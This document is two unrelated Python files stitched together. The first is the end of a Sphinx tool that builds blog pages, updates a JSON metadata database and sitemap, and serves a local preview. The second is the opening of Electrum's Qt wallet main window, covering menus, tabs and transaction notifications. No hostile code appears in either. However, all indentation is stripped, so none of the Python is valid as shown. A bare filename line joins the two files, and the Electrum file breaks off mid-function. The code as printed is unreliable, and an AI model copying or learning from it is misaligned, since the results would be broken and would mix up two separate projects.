Initialize the new document folder with configuration files.
"""
# Read the general conf.py settings from hyperconf.json
hyperconf_path = os.path.join(CONFIG, "hyperconf.json")
doc_conf = load_json(hyperconf_path)
## Add doc-wise information & Sort
doc_conf['year'] = int(f"{datetime.datetime.today():%Y}")
doc_conf['project'] = doctitle
doc_conf = sort_dict(doc_conf)
# Append blog title to canonical url
if 'canonical_url' in doc_conf['html_theme_options']:
doc_conf['html_theme_options']['canonical_url'] += f"{docname}/"
# Write the dict into a .py file
def write_dict_value(dict_val):
## Dict value is either string or int/list
if isinstance(dict_val, str):
write_str = '"{}"'.format(dict_val.strip('"'))
else:
write_str = dict_val
return write_str
conf_str = '\n'.join([
f"{k} = {write_dict_value(v)}" for k,v in doc_conf.items()
])
write_str_into_file(conf_str, docname, "conf.py")
def init_index_rst(docname, doctitle):
"""
Initialize the index.rst for table of content of the document.
"""
rst_config_template =read_from_file(os.path.join(CONFIG, "index.rst"))
title_heading = "{}\n{}\n".format(doctitle, '='*(len(doctitle) + 4))
rst_str = rst_config_template.replace("{{ title heading }}", title_heading)
write_str_into_file(rst_str, docname, "index.rst")
def init_new_doc(docname, doctitle):
"""
Init/Copy files:
+ "conf.py"
+ "index.rst"
"""
init_conf_py(docname, doctitle) # Init conf.py
init_index_rst(docname, doctitle) # Init index.rst
def sphinx_build(docname, update_home=True):
"""
Build the Sphinx website and output files in specifc folder.
"""
if docname == "_homepage" and update_home:
update_homepage()
return
# Buld the HTML website
build_dirname = "build"
build_dir = docsrc_prefix_path(docname, build_dirname)
src_dir = docsrc_prefix_path(docname)
cmd = f"sphinx-build -M html {src_dir} {build_dir}"
os.system(cmd)
# Copy to /docs folder
if docname != "_homepage":
dst_dir = docdst_prefix_path(docname)
else:
dst_dir = docdst_prefix_path("")
shutil.copytree(os.path.join(build_dir, "html"), dst_dir, dirs_exist_ok=True)
# Delete the build folder from src directory
shutil.rmtree(build_dir)
print("---\nHTML pages have been moved into " + dst_dir)
# Automatically update the database & homepage
if docname != "_homepage":
update_database(docname)
if update_home:
update_homepage()
def update_json(json_file, docname, docmeta):
if docname == "_homepage":
return
d = load_json(json_file)
def _treat_as_list(inputs):
return inputs if isinstance(inputs, list) else [inputs]
def _add_doc_to_list(parentkey):
multiple_value_lst = _treat_as_list(docmeta[parentkey])
for child in multiple_value_lst:
children_docs = d[parentkey].get(child, [])
if docname not in children_docs:
children_docs.append(docname)
d[parentkey][child] = sorted(children_docs)
# Delete relevant records first (if docname exists)
if docname in d["blogs"]:
pop_meta = d["blogs"][docname]
for parentkey in "series,keywords,category".split(','):
for key in _treat_as_list(pop_meta[parentkey]):
after_remove = [x for x in d[parentkey][key] if x != docname]
if after_remove:
d[parentkey][key] = after_remove
else: # delete the key if the list is empty
_ = d[parentkey].pop(key, None)
_ = d["blogs"].pop(docname, None)
# If docmeta != None, add relevant records
if docmeta:
# Add to blogs key
d["blogs"][docname] = docmeta
# Add to series key
series_docs = d["series"].get(docmeta["series"], [])
if docname not in series_docs:
series_docs.append(docname)
series_lst = []
for doc in series_docs:
doc_series_num = int(d["blogs"][doc].get("series_num", -1))
series_lst.append((doc_series_num, doc))
d["series"][docmeta["series"]] = [val[1] for val in sorted(series_lst)]
# Add to keywords & category key
for parent_key in "keywords,category".split(','):
_add_doc_to_list(parent_key)
# Update homepage meta
d["_homepage"]["date_modified"] = f"{datetime.datetime.today():%Y-%m-%d}"
# Sort keys and write back to the json file
for k in "_homepage,blogs,category,keywords,series".split(","):
d[k] = sort_dict(d[k])
with open(json_file, 'w', encoding=ENCODING) as f:
json.dump(d, f, indent=4, ensure_ascii=False)
def update_database(docname):
"""
Update the metadata database & sitemap after building cuurent document.
"""
# Read the meta header of the source document RST
doc_str_lines = read_from_file(docsrc_prefix_path(docname, "index.rst"), join=False)
doc_meta = dict()
for line in doc_str_lines[1:]:
line = line.strip()
if line.startswith(':'):
key, value = line[1:].split(':', 1)
doc_meta[key] = value.strip()
else:
break
# Update modification date
doc_meta["keywords"] = [x.strip() for x in doc_meta["keywords"].split(',')]
doc_meta["date_build"] = f"{datetime.datetime.today():%Y-%m-%d}"
doc_meta["abstract"] = doc_meta.pop("abstract") # put abstract at last
# Write into the database
update_json(CONFIG_DATABASE, docname, doc_meta)
# Update sitemap
update_sitemap()
print('Database & sitemap has been updated.')
def update_homepage():
"""
Update & build the homepage based on the latest updated document.
"""
def _generate_blog_datatable():
total_meta = load_json(CONFIG_DATABASE)
blog_list = [doc for doc in total_meta["blogs"].keys() if not doc.startswith('_')]
table_wrapper = lambda tabhtml: f'<table id="tableofblogs" class="display">\n{tabhtml}\n</table>'
def write_tabrow(rowdata, wrapper='tbody'):
inner = 'td' if wrapper == 'tbody' else 'th'
inner_html = '\n'.join([f"<{inner}>{x}</{inner}>" for x in rowdata])
row_html = f"<tr>\n{inner_html}\n</tr>"
return row_html
# Write table head <thead>
head_row = "日志名,分类,摘要,上线,更新".split(',')
head_html = f"<thead>\n{write_tabrow(head_row, 'thead')}\n</thead>"
# Write table body <tbody>
table_rows = ["" for _ in blog_list]
for i, docname in enumerate(blog_list):
doc_meta = total_meta["blogs"][docname]
doc_row = [
f'<a href="{docname}/index.html">{docname}</a>',
doc_meta["category"],
doc_meta["abstract"],
doc_meta["date_init"],
doc_meta["date_modified"]
]
table_rows[i] = write_tabrow(doc_row, 'tbody')
tbody_html = '\n'.join(table_rows)
body_html = f"<tbody>\n{tbody_html}\n</tbody>"
return table_wrapper(f"{head_html}\n{body_html}")
rst_str = read_from_file(os.path.join(CONFIG, "index-homepage.rst"))
blog_table_str = _generate_blog_datatable()
write_str_into_file(blog_table_str, "_homepage", "tableofblogs.html")
# Write it to index.rst and build the homepage
write_str_into_file(rst_str, "_homepage", "index.rst")
sphinx_build("_homepage", update_home=False) # Avoid self-cycle
def update_index_rst_modified_date(docname):
"""
Use 'git diff' to check if any file in docsrc/docname folder has been changed.
If any, update the modified date metadata in index.rst.
"""
meta_key = ":date_modified:"
date_regex = re.compile(r"\d{4}-\d{2}-\d{2}")
def get_command_output(cmdstr):
cmd_strlst = cmdstr.split()
cmd_output = subprocess.run(cmd_strlst, stdout=subprocess.PIPE).stdout.decode('utf-8')
return cmd_output
# Check if there is change in any file that has been:
# * Modified but not staged yet, or
# * Staged
diff_modified = f"git diff --name-only docsrc/{docname}"
output_modified = get_command_output(diff_modified)
diff_staged = f"git diff --name-only --staged docsrc/{docname}"
output_staged = get_command_output(diff_staged)
if len(output_modified) + len(output_staged) > 0:
date_now = f"{datetime.datetime.today():%Y-%m-%d}"
index_rst = read_from_file(docsrc_prefix_path(docname, 'index.rst'), join=False)
# Find the date modified line number
lineindex = -1
for i, line in enumerate(index_rst):
if line.lstrip().startswith(meta_key):
lineindex = i
break
if lineindex >= 0:
index_rst[lineindex] = re.sub(date_regex, date_now, index_rst[lineindex])
# Write back to index.rst
index_rst_str = ''.join(index_rst)
write_str_into_file(index_rst_str, docname, 'index.rst')
print(f"Auto-update modified date in {docname}/index.rst.")
def update_sitemap():
"""
Read blog data from CONFIG_DATABASE and write it into sitemap.
"""
sitemap_str = ('<?xml version="1.0" encoding="UTF-8"?>\n\n'
'<urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">')
sitemap_foot = '</urlset>'
def create_sitemap_item(url, lastmod):
item = (
" <url>\n"
f" <loc>{url}</loc>\n"
f" <lastmod>{lastmod}</lastmod>\n"
" </url>"
)
return item
# Read blogs data
db = load_json(CONFIG_DATABASE)
blogs = sort_dict(db["blogs"])
site_lastmod = db["_homepage"]["date_modified"]
site_docs = {}
for dockey in [*blogs.keys(), "_homepage"]:
dirpath = os.path.join(DOCSRC, dockey)
files = [f for f in os.listdir(dirpath) if f.endswith(('.ipynb', '.rst'))]
lastmod = blogs[dockey]["date_build"] if dockey != "_homepage" else site_lastmod
for docpage_fname in files:
pname, _ = os.path.splitext(docpage_fname)
if dockey == '_homepage':
item_url = SITE_BASEURL # Main site canonical url
else:
item_url = f"{SITE_BASEURL}{dockey}/{pname}.html"
site_docs[item_url] = lastmod
# Join all page items
for url, moddate in site_docs.items():
sitemap_item = create_sitemap_item(url, moddate)
sitemap_str += "\n" + sitemap_item
sitemap_str += "\n" + sitemap_foot
with open(CONFIG_SITEMAP, 'w', encoding=ENCODING) as f:
f.write(sitemap_str)
def remove_doc(docname, update_home=True):
"""
Remove a doc from both local file and the database.
"""
check_remove = None
while not check_remove:
user_option = input(f"Are you sure to remove {docname}? [y/n] y: ")
if user_option in list('yn'):
check_remove = user_option
if check_remove == "n":
exit
# Remove source & build directory, if exists
doc_dir = docsrc_prefix_path(docname)
build_dir = docdst_prefix_path(docname)
for dirpath in (doc_dir, build_dir):
if os.path.isdir(dirpath):
shutil.rmtree(dirpath)
# Remove docname key from the database
update_json(CONFIG_DATABASE, docname, None)
if update_home:
update_homepage()
print(f"Removed {docname} from the database, {doc_dir}, and {build_dir}.")
def start_local_server(docname):
"""
Host a mini local server to preview the website before online.
"""
bind, port = "localhost", 8000
if docname == "_homepage":
doc_url = f"http://{bind}:{port}"
else:
doc_url = f"http://{bind}:{port}/{docname}/"
class Handler(SimpleHTTPRequestHandler):
def __init__(self, *args, **kwargs):
super().__init__(*args, directory=DOCDST, **kwargs)
httpd = HTTPServer((bind, port), Handler)
thread = threading.Thread(target=httpd.serve_forever)
thread.start()
# Open the doc main webpage in the webbrowser
os.system(f'PowerShell -Command "Start-Process -FilePath {doc_url}"')
# Press Enter for server shutdown
_ = input(f'\nHosting server at {bind}:{port}. Press Enter to terminate ...\n\n')
httpd.shutdown()
print('---\nLocal server has been terminated.')
def enable_args():
parser = argparse.ArgumentParser(
description='Tool for making Sphinx HTML pages.'
)
args_help = {
"docname": "Specify the docname (also project folder name).",
"--create": "Create a new project. Won't overwrite existing ones. (Exclusive to --build)",
"--build": "Build a project. (Exclusive to --create)",
"--title": "Give a title to new project. Only work in --create mode.",
"--config": "Specific the config folder path.",
"--remove": "Remove a document from the website.",
"--no-update-homepage": "Don't autobuild homepage. Work in --build/remove mode.",
"--server": "Host a local server to preview website."
}
parser.add_argument('docname', help=args_help['docname'])
parser_group = parser.add_mutually_exclusive_group()
parser_group.add_argument('--build', '-b', help=args_help['--build'], action='store_true')
parser_group.add_argument('--create', '-c', dest='build', help=args_help["--create"], action='store_false')
parser_group.add_argument('--remove', '-R', help=args_help["--remove"], action='store_true')
parser_group.add_argument('--server', '-s', help=args_help['--server'], action='store_true')
parser_group.set_defaults(build=True, remove=False, server=False)
parser.add_argument('--title', '-t', help=args_help['--title'], nargs='+', default=None)
parser.add_argument('--no-update-homepage', '-N', dest='update_homepage', help=args_help['--no-update-homepage'], action='store_false')
# Exclusive modes: build, create, server, remove.
args = parser.parse_args()
if args.remove:
remove_doc(args.docname, args.update_homepage)
elif args.server:
start_local_server(args.docname)
# Exclusive modes: build, create
elif args.build:
if args.docname == ".":
_doclst = [d for d in os.listdir('docsrc') if not d.startswith('_')]
for d in _doclst:
update_index_rst_modified_date(d)
sphinx_build(d, args.update_homepage)
else:
# Update modified date if docsrc files have changed
update_index_rst_modified_date(args.docname)
sphinx_build(args.docname, args.update_homepage)
else: # create
title = ' '.join(args.title) if args.title else args.docname
create_new_doc(args.docname, title)
# --- Main ---
enable_args()
|
main_window.py
|
#!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2012 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys, time, threading
import os, json, traceback
import shutil
import weakref
import webbrowser
import csv
from decimal import Decimal
import base64
from functools import partial
from PyQt5.QtCore import Qt
from PyQt5.QtGui import *
from PyQt5.QtWidgets import *
from electrum.util import bh2u, bfh
from electrum import keystore
from electrum.bitcoin import COIN, is_address, TYPE_ADDRESS
from electrum.plugins import run_hook
from electrum.i18n import _
from electrum.util import (format_time, format_satoshis, PrintError,
format_satoshis_plain, NotEnoughFunds,
UserCancelled)
from electrum import Transaction
from electrum import util, bitcoin, commands, coinchooser
from electrum import paymentrequest
from electrum.wallet import Multisig_Wallet
try:
from electrum.plot import plot_history
except:
plot_history = None
from .amountedit import AmountEdit, BTCAmountEdit, MyLineEdit
from .qrcodewidget import QRCodeWidget, QRDialog
from .qrtextedit import ShowQRTextEdit, ScanQRTextEdit
from .transaction_dialog import show_transaction
from .fee_slider import FeeSlider
from .util import *
class StatusBarButton(QPushButton):
def __init__(self, icon, tooltip, func):
QPushButton.__init__(self, icon, '')
self.setToolTip(tooltip)
self.setFlat(True)
self.setMaximumWidth(25)
self.clicked.connect(self.onPress)
self.func = func
self.setIconSize(QSize(25,25))
def onPress(self, checked=False):
'''Drops the unwanted PyQt5 "checked" argument'''
self.func()
def keyPressEvent(self, e):
if e.key() == Qt.Key_Return:
self.func()
from electrum.paymentrequest import PR_PAID
class ElectrumWindow(QMainWindow, MessageBoxMixin, PrintError):
payment_request_ok_signal = pyqtSignal()
payment_request_error_signal = pyqtSignal()
notify_transactions_signal = pyqtSignal()
new_fx_quotes_signal = pyqtSignal()
new_fx_history_signal = pyqtSignal()
network_signal = pyqtSignal(str, object)
alias_received_signal = pyqtSignal()
computing_privkeys_signal = pyqtSignal()
show_privkeys_signal = pyqtSignal()
def __init__(self, gui_object, wallet):
QMainWindow.__init__(self)
self.gui_object = gui_object
self.config = config = gui_object.config
self.network = gui_object.daemon.network
self.fx = gui_object.daemon.fx
self.invoices = wallet.invoices
self.contacts = wallet.contacts
self.tray = gui_object.tray
self.app = gui_object.app
self.cleaned_up = False
self.is_max = False
self.payment_request = None
self.checking_accounts = False
self.qr_window = None
self.not_enough_funds = False
self.pluginsdialog = None
self.require_fee_update = False
self.tx_notifications = []
self.tl_windows = []
self.tx_external_keypairs = {}
self.create_status_bar()
self.need_update = threading.Event()
self.decimal_point = config.get('decimal_point', 5)
self.fee_unit = config.get('fee_unit', 0)
self.num_zeros = int(config.get('num_zeros',0))
self.completions = QStringListModel()
self.tabs = tabs = QTabWidget(self)
self.send_tab = self.create_send_tab()
self.receive_tab = self.create_receive_tab()
self.addresses_tab = self.create_addresses_tab()
self.utxo_tab = self.create_utxo_tab()
self.console_tab = self.create_console_tab()
self.contacts_tab = self.create_contacts_tab()
tabs.addTab(self.create_history_tab(), QIcon(":icons/tab_history.png"), _('History'))
tabs.addTab(self.send_tab, QIcon(":icons/tab_send.png"), _('Send'))
tabs.addTab(self.receive_tab, QIcon(":icons/tab_receive.png"), _('Receive'))
def add_optional_tab(tabs, tab, icon, description, name):
tab.tab_icon = icon
tab.tab_description = description
tab.tab_pos = len(tabs)
tab.tab_name = name
if self.config.get('show_{}_tab'.format(name), False):
tabs.addTab(tab, icon, description.replace("&", ""))
add_optional_tab(tabs, self.addresses_tab, QIcon(":icons/tab_addresses.png"), _("&Addresses"), "addresses")
add_optional_tab(tabs, self.utxo_tab, QIcon(":icons/tab_coins.png"), _("Co&ins"), "utxo")
add_optional_tab(tabs, self.contacts_tab, QIcon(":icons/tab_contacts.png"), _("Con&tacts"), "contacts")
add_optional_tab(tabs, self.console_tab, QIcon(":icons/tab_console.png"), _("Con&sole"), "console")
tabs.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
self.setCentralWidget(tabs)
if self.config.get("is_maximized"):
self.showMaximized()
self.setWindowIcon(QIcon(":icons/electrum.png"))
self.init_menubar()
wrtabs = weakref.proxy(tabs)
QShortcut(QKeySequence("Ctrl+W"), self, self.close)
QShortcut(QKeySequence("Ctrl+Q"), self, self.close)
QShortcut(QKeySequence("Ctrl+R"), self, self.update_wallet)
QShortcut(QKeySequence("Ctrl+PgUp"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() - 1)%wrtabs.count()))
QShortcut(QKeySequence("Ctrl+PgDown"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() + 1)%wrtabs.count()))
for i in range(wrtabs.count()):
QShortcut(QKeySequence("Alt+" + str(i + 1)), self, lambda i=i: wrtabs.setCurrentIndex(i))
self.payment_request_ok_signal.connect(self.payment_request_ok)
self.payment_request_error_signal.connect(self.payment_request_error)
self.notify_transactions_signal.connect(self.notify_transactions)
self.history_list.setFocus(True)
# network callbacks
if self.network:
self.network_signal.connect(self.on_network_qt)
interests = ['updated', 'new_transaction', 'status',
'banner', 'verified', 'fee']
# To avoid leaking references to "self" that prevent the
# window from being GC-ed when closed, callbacks should be
# methods of this class only, and specifically not be
# partials, lambdas or methods of subobjects. Hence...
self.network.register_callback(self.on_network, interests)
# set initial message
self.console.showMessage(self.network.banner)
self.network.register_callback(self.on_quotes, ['on_quotes'])
self.network.register_callback(self.on_history, ['on_history'])
self.new_fx_quotes_signal.connect(self.on_fx_quotes)
self.new_fx_history_signal.connect(self.on_fx_history)
# update fee slider in case we missed the callback
self.fee_slider.update()
self.load_wallet(wallet)
self.connect_slots(gui_object.timer)
self.fetch_alias()
def on_history(self, b):
self.new_fx_history_signal.emit()
def on_fx_history(self):
self.history_list.refresh_headers()
self.history_list.update()
self.address_list.update()
def on_quotes(self, b):
self.new_fx_quotes_signal.emit()
def on_fx_quotes(self):
self.update_status()
# Refresh edits with the new rate
edit = self.fiat_send_e if self.fiat_send_e.is_last_edited else self.amount_e
edit.textEdited.emit(edit.text())
edit = self.fiat_receive_e if self.fiat_receive_e.is_last_edited else self.receive_amount_e
edit.textEdited.emit(edit.text())
# History tab needs updating if it used spot
if self.fx.history_used_spot:
self.history_list.update()
def toggle_tab(self, tab):
show = not self.config.get('show_{}_tab'.format(tab.tab_name), False)
self.config.set_key('show_{}_tab'.format(tab.tab_name), show)
item_text = (_("Hide") if show else _("Show")) + " " + tab.tab_description
tab.menu_action.setText(item_text)
if show:
# Find out where to place the tab
index = len(self.tabs)
for i in range(len(self.tabs)):
try:
if tab.tab_pos < self.tabs.widget(i).tab_pos:
index = i
break
except AttributeError:
pass
self.tabs.insertTab(index, tab, tab.tab_icon, tab.tab_description.replace("&", ""))
else:
i = self.tabs.indexOf(tab)
self.tabs.removeTab(i)
def push_top_level_window(self, window):
'''Used for e.g. tx dialog box to ensure new dialogs are appropriately
parented. This used to be done by explicitly providing the parent
window, but that isn't something hardware wallet prompts know.'''
self.tl_windows.append(window)
def pop_top_level_window(self, window):
self.tl_windows.remove(window)
def top_level_window(self):
'''Do the right thing in the presence of tx dialog windows'''
override = self.tl_windows[-1] if self.tl_windows else None
return self.top_level_window_recurse(override)
def diagnostic_name(self):
return "%s/%s" % (PrintError.diagnostic_name(self),
self.wallet.basename() if self.wallet else "None")
def is_hidden(self):
return self.isMinimized() or self.isHidden()
def show_or_hide(self):
if self.is_hidden():
self.bring_to_top()
else:
self.hide()
def bring_to_top(self):
self.show()
self.raise_()
def on_error(self, exc_info):
if not isinstance(exc_info[1], UserCancelled):
traceback.print_exception(*exc_info)
self.show_error(str(exc_info[1]))
def on_network(self, event, *args):
if event == 'updated':
self.need_update.set()
self.gui_object.network_updated_signal_obj.network_updated_signal \
.emit(event, args)
elif event == 'new_transaction':
self.tx_notifications.append(args[0])
self.notify_transactions_signal.emit()
elif event in ['status', 'banner', 'verified', 'fee']:
# Handle in GUI thread
self.network_signal.emit(event, args)
else:
self.print_error("unexpected network message:", event, args)
def on_network_qt(self, event, args=None):
# Handle a network message in the GUI thread
if event == 'status':
self.update_status()
elif event == 'banner':
self.console.showMessage(args[0])
elif event == 'verified':
self.history_list.update_item(*args)
elif event == 'fee':
if self.config.is_dynfee():
self.fee_slider.update()
self.do_update_fee()
else:
self.print_error("unexpected network_qt signal:", event, args)
def fetch_alias(self):
self.alias_info = None
alias = self.config.get('alias')
if alias:
alias = str(alias)
def f():
self.alias_info = self.contacts.resolve_openalias(alias)
self.alias_received_signal.emit()
t = threading.Thread(target=f)
t.setDaemon(True)
t.start()
def close_wallet(self):
if self.wallet:
self.print_error('close_wallet', self.wallet.storage.path)
run_hook('close_wallet', self.wallet)
def load_wallet(self, wallet):
wallet.thread = TaskThread(self, self.on_error)
self.wallet = wallet
self.update_recently_visited(wallet.storage.path)
# address used to create a dummy transaction and estimate transaction fee
self.history_list.update()
self.address_list.update()
self.utxo_list.update()
self.need_update.set()
# Once GUI has been initialized check if we want to announce something since the callback has been called before the GUI was initialized
self.notify_transactions()
# update menus
self.seed_menu.setEnabled(self.wallet.has_seed())
self.update_lock_icon()
self.update_buttons_on_seed()
self.update_console()
self.clear_receive_tab()
self.request_list.update()
self.tabs.show()
self.init_geometry()
if self.config.get('hide_gui') and self.gui_object.tray.isVisible():
self.hide()
else:
self.show()
self.watching_only_changed()
run_hook('load_wallet', wallet, self)
def init_geometry(self):
winpos = self.wallet.storage.get("winpos-qt")
try:
screen = self.app.desktop().screenGeometry()
assert screen.contains(QRect(*winpos))
self.setGeometry(*winpos)
except:
self.print_error("using default geometry")
self.setGeometry(100, 100, 840, 400)
def watching_only_changed(self):
title = 'Electrum %s - %s' % (self.wallet.electrum_version,
self.wallet.basename())
extra = [self.wallet.storage.get('wallet_type', '?')]
if self.wallet.is_watching_only():
self.warn_if_watching_only()
extra.append(_('watching only'))
title += ' [%s]'% ', '.join(extra)
self.setWindowTitle(title)
self.password_menu.setEnabled(self.wallet.can_change_password())
self.import_privkey_menu.setVisible(self.wallet.can_import_privkey())
self.import_address_menu.setVisible(self.wallet.can_import_address())
self.export_menu.setEnabled(self.wallet.can_export())
def warn_if_watching_only(self):
if self.wallet.is_watching_only():
msg = ' '.join([
_("This wallet is watching-only."),
_("This means you will not be able to spend Bitcoins with it."),
_("Make sure you own the seed phrase or the private keys, before you request Bitcoins to be sent to this wallet.")
])
self.show_warning(msg, title=_('Information'))
def open_wallet(self):
wallet_folder = self.get_wallet_folder()
filename, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if not filename:
return
self.gui_object.new_window(filename)
def backup_wallet(self):
path = self.wallet.storage.path
wallet_folder = os.path.dirname(path)
filename, __ = QFileDialog.getSaveFileName(self, _('Enter a filename for the copy of your wallet'), wallet_folder)
if not filename:
return
new_path = os.path.join(wallet_folder, filename)
if new_path != path:
try:
shutil.copy2(path, new_path)
self.show_message(_("A copy of your wallet file was created in")+" '%s'" % str(new_path), title=_("Wallet backup created"))
except (IOError, os.error) as reason:
self.show_critical(_("Electrum was unable to copy your wallet file to the specified location.") + "\n" + str(reason), title=_("Unable to create backup"))
def update_recently_visited(self, filename):
recent = self.config.get('recently_open', [])
try:
sorted(recent)
except:
recent = []
if filename in recent:
recent.remove(filename)
recent.insert(0, filename)
recent = recent[:5]
self.config.set_key('recently_open', recent)
self.recently_visited_menu.clear()
for i, k in enumerate(sorted(recent)):
b = os.path.basename(k)
def loader(k):
return lambda: self.gui_object.new_window(k)
self.recently_visited_menu.addAction(b, loader(k)).setShortcut(QKeySequence("Ctrl+%d"%(i+1)))
self.recently_visited_menu.setEnabled(len(recent))
def get_wallet_folder(self):
return os.path.dirname(os.path.abspath(self.config.get_wallet_path()))
def new_wallet(self):
wallet_folder = self.get_wallet_folder()
i = 1
while True:
filename = "wallet_%d" % i
if filename in os.listdir(wallet_folder):
i += 1
else:
break
full_path = os.path.join(wallet_folder, filename)
self.gui_object.start_new_window(full_path, None)
def init_menubar(self):
menubar = QMenuBar()
file_menu = menubar.addMenu(_("&File"))
self.recently_visited_menu = file_menu.addMenu(_("&Recently open"))
file_menu.addAction(_("&Open"), self.open_wallet).setShortcut(QKeySequence.Open)
file_menu.addAction(_("&New/Restore"), self.new_wallet).setShortcut(QKeySequence.New)
file_menu.addAction(_("&Save Copy"), self.backup_wallet).setShortcut(QKeySequence.SaveAs)
file_menu.addAction(_("Delete"), self.remove_wallet)
file_menu.addSeparator()
file_menu.addAction(_("&Quit"), self.close)
wallet_menu = menubar.addMenu(_("&Wallet"))
wallet_menu.addAction(_("&Information"), self.show_master_public_keys)
wallet_menu.addSeparator()
self.password_menu = wallet_menu.addAction(_("&Password"), self.change_password_dialog)
self.seed_menu = wallet_menu.addAction(_("&Seed"), self.show_seed_dialog)
self.private_keys_menu = wallet_menu.addMenu(_("&Private keys"))
self.private_keys_menu.addAction(_("&Sweep"), self.sweep_key_dialog)
self.import_privkey_menu = self.private_keys_menu.addAction(_("&Import"), self.do_import_privkey)
self.export_menu = self.private_keys_menu.addAction(_("&Export"), self.export_privkeys_dialog)
self.import_address_menu = wallet_menu.addAction(_("Import addresses"), self.import_addresses)
wallet_menu.addSeparator()
labels_menu = wallet_menu.addMenu(_("&Labels"))
labels_menu.addAction(_("&Import"), self.do_import_labels)
labels_menu.addAction(_("&Export"), self.do_export_labels)
contacts_menu = wallet_menu.addMenu(_("Contacts"))
contacts_menu.addAction(_("&New"), self.new_contact_dialog)
contacts_menu.addAction(_("Import"), lambda: self.contact_list.import_contacts())
invoices_menu = wallet_menu.addMenu(_("Invoices"))
invoices_menu.addAction(_("Import"), lambda: self.invoice_list.import_invoices())
hist_menu = wallet_menu.addMenu(_("&History"))
hist_menu.addAction("Plot", self.plot_history_dialog).setEnabled(plot_history is not None)
hist_menu.addAction("Export", self.export_history_dialog)
wallet_menu.addSeparator()
wallet_menu.addAction(_("Find"), self.toggle_search).setShortcut(QKeySequence("Ctrl+F"))
def add_toggle_action(view_menu, tab):
is_shown = self.config.get('show_{}_tab'.format(tab.tab_name), False)
item_name = (_("Hide") if is_shown else _("Show")) + " " + tab.tab_description
tab.menu_action = view_menu.addAction(item_name, lambda: self.toggle_tab(tab))
view_menu = menubar.addMenu(_("&View"))
add_toggle_action(view_menu, self.addresses_tab)
add_toggle_action(view_menu, self.utxo_tab)
add_toggle_action(view_menu, self.contacts_tab)
add_toggle_action(view_menu, self.console_tab)
tools_menu = menubar.addMenu(_("&Tools"))
# Settings / Preferences are all reserved keywords in OSX using this as work around
tools_menu.addAction(_("Electrum preferences") if sys.platform == 'darwin' else _("Preferences"), self.settings_dialog)
tools_menu.addAction(_("&Network"), lambda: self.gui_object.show_network_dialog(self))
tools_menu.addAction(_("&Plugins"), self.plugins_dialog)
tools_menu.addSeparator()
tools_menu.addAction(_("&Sign/verify message"), self.sign_verify_message)
tools_menu.addAction(_("&Encrypt/decrypt message"), self.encrypt_message)
tools_menu.addSeparator()
paytomany_menu = tools_menu.addAction(_("&Pay to many"), self.paytomany)
raw_transaction_menu = tools_menu.addMenu(_("&Load transaction"))
raw_transaction_menu.addAction(_("&From file"), self.do_process_from_file)
raw_transaction_menu.addAction(_("&From text"), self.do_process_from_text)
raw_transaction_menu.addAction(_("&From the blockchain"), self.do_process_from_txid)
raw_transaction_menu.addAction(_("&From QR code"), self.read_tx_from_qrcode)
self.raw_transaction_menu = raw_transaction_menu
run_hook('init_menubar_tools', self, tools_menu)
help_menu = menubar.addMenu(_("&Help"))
help_menu.addAction(_("&About"), self.show_about)
help_menu.addAction(_("&Official website"), lambda: webbrowser.open("http://electrum.org"))
help_menu.addSeparator()
help_menu.addAction(_("&Documentation"), lambda: webbrowser.open("http://docs.electrum.org/")).setShortcut(QKeySequence.HelpContents)
help_menu.addAction(_("&Report Bug"), self.show_report_bug)
help_menu.addSeparator()
help_menu.addAction(_("&Donate to server"), self.donate_to_server)
self.setMenuBar(menubar)
def donate_to_server(self):
d = self.network.get_donation_address()
if d:
host = self.network.get_parameters()[0]
self.pay_to_URI('bitcoin:%s?message=donation for %s'%(d, host))
else:
self.show_error(_('No donation address for this server'))
def show_about(self):
QMessageBox.about(self, "Electrum",
_("Version")+" %s" % (self.wallet.electrum_version) + "\n\n" +
_("Electrum's focus is speed, with low resource usage and simplifying Bitcoin. You do not need to perform regular backups, because your wallet can be recovered from a secret phrase that you can memorize or write on paper. Startup times are instant because it operates in conjunction with high-performance servers that handle the most complicated parts of the Bitcoin system." + "\n\n" +
_("Uses icons from the Icons8 icon pack (icons8.com).")))
def show_report_bug(self):
msg = ' '.join([
_("Please report any bugs as issues on github:<br/>"),
"<a href=\"https://github.com/spesmilo/electrum/issues\">https://github.com/spesmilo/electrum/issues</a><br/><br/>",
_("Before reporting a bug, upgrade to the most recent version of Electrum (latest release or git HEAD), and include the version number in your report."),
_("Try to explain not only what the bug is, but how it occurs.")
])
self.show_message(msg, title="Electrum - " + _("Reporting Bugs"))
def notify_transactions(self):
if not self.network or not self.network.is_connected():
return
self.print_error("Notifying GUI")
if len(self.tx_notifications) > 0:
# Combine the transactions if there are more then three
tx_amount = len(self.tx_notifications)
if(tx_amount >= 3):
total_amount = 0
for tx in self.tx_notifications:
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if(v > 0):
total_amount += v
self.notify(_("%(txs)s new transactions received: Total amount received in the new transactions %(amount)s") \
% { 'txs' : tx_amount, 'amount' : self.format_amount_and_units(total_amount)})
self.tx_notifications = []
else:
for tx in self.tx_notifications:
if tx:
self.tx_notifications.remove(tx)
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
